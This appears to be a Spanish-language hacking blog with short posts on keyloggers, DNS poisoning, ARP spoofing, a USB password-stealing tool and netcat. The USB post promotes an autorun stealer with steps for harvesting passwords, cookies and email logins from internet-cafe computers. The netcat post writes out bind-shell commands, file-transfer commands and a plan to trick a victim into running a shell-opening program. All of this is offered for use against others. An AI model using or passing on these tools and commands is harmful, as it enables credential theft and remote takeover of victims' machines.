Keyloggers

En esta época de los virus y del spam,que parece que tienen inteligencia artificial,o incluso en estos momentos que estoy escribiendo esta entrada…¿Alguna vez te has parado a imaginar que cualquiera de estos programas pueda capturar todas las teclas que pulsas del teclado?Pues si nunca te los has imaginado aquí te presento este tipo de software.«The Keyloggers» o también llamados registradores de teclas.

Continue reading →

Mi pen drive ladrón

Les presento el hacking por USB.

Este programa roba toda clase de contraseñas e informacion confidencial de un PC en el que insertes tu USB, esto lo logra mediante un archivo autorun que ejecuta varias miniutilidades que tiene el programa entre otras lo que te puede ayudar a conseguir este programa es:

  • Toda clase de contraseñas del navegador web Tuenti,Fotolog,Myspace…es decir,todas las contraseñas que tenga el navegador guardadas.
  • Historial de navegacion completo.
  • Clientes de correo tales como msn, yahoo, gmail y demás.
  • Licencias de los programas y mucho más.
  • Las cookies del navegador.
  • Toda la información de su hardware e IPs.
  • Los puertos abiertos recientemente.

¿Como usarlo?

  1. Descargas el archivo lo descomprimes y cortas todos los archivos que están dentro de la carpetaHack. Luego abres tu USB y pegas los 5 archivos que contiene.
  2. Una vez preparado en tu memoria puedes ir a cualquier cyber…a recogerlo todo.
  3. Llegas trankilamente a tu PC de cada y revisas la carpeta «Dump» y tendrás información en varios ficheros con los nombres de las víctimas en ficheros .html

Tiempo estimado de tener el Pen Drive insertado(calculado por mi): 9 segundos.

¿Donde descargarlo?

Rapidshare (500kb)

En el mio no funciona 🙂

Ya me comentareis sus utilidades abajo.

DNS Poisoning

El envenamiento de la caché DNS o también conocido com Pharming es una situación creada de manera maliciosa o no deseada que provee datos de un Servidor de Nombres de Dominio. Esto puede pasar debido a diseño inapropiado de software, falta de configuración de nombres de servidores y escenarios maliciosamente diseñados que explotan la arquitectura tradicionalmente abierta de un sistema DNS. Una vez que un servidor DNS ha recibido aquellos datos no autentificados y los almacena temporalmente para futuros incrementos de desempeño, es considerado envenenado, extendiendo el efecto de la situación a los clientes del servidor. Continue reading →

Arp Spoofing

Hoy me gustaría mencionar el tipo de ataque Arp Spoofing o también conocido como Arp Poisoning(envenenamiento de tablas Arp), ya que podría ser lo primero que usaría una persona que quisiera obtener alguna contraseña de alguna de tus cuentas. Pues bien, el Arp Spoofing es una técnica usada para infiltrarse en una red Ethernet basada en Switchs que puede permitir al atacantante husmear paquetes en la LAN,modificar el trafico e incluso pararlo.El principio del ARP Spoofing es enviar mensajes ARP falsos,la finalidad es asociar la MAC del atacante con la IP de otro nodo (el nodo atacado), como por ejemplo la puerta de enlace predeterminada (router). Cualquier tráfico dirigido a la dirección IP de ese nodo, será erróneamente enviado al atacante, en lugar de a su destino real.


Continue reading →

Net Cat «la navaja multiusos»

Esta herramienta que hoy presento ocupa sobre unos 100kb y sus aplicaciones son infinitas(Desde montar un chat, hasta enviar ficheros o averiguar datos sonbre una web,hasta obtener shells remotas vía LAN o vía WAN).Por eso se ha hecho tan famosa y recibe el nombre de «la navaja multiusos del hacker».

¿Cómo obtener una shell?

Es tan sencillo como abrir una consola en el cliente y poner: nc.exe -L -e cmd.exe -p 6000
En el equipo atacante se pondría: nc.exe 192.168.0.3 6000 y ya estaríamos conectados al cliente.

Pero ocurre un problema,si queremos acceder a un equipo donde no tenemos acceso físico a la máquina siempre se puede utilizar la ingeniería social y enviar a la victima un programa engañoso que haga el trabajo de la parte del cliente del netcat,es decir abrir un puerto a la escucha para que nos podamos conectar y obtener el control del ordenador.Pues bien el programa está aquí:

Si complilamos el exe y lo ejecutamos hace exactamente la misma función.

Enviar y recibir archivos con NetCat

Para poder enviar y recibir archivos con net cat hay que ejecutar comandos en las dos maquinas,o compilar un exe que los ejecute por el netcat.De cualquier suponiendo que el atacante quiere enviar a la vicima,los comando son los siguientes:

Atacante: nc.exe 192.168.0.3 6000 < «archivo»
Víctima: nc.exe -l -p 6000 > «nombre que se le da al archivo»

Netcat se puede descarga aquí.

Y esto es todo por hoy,a probar y a comentar resultados.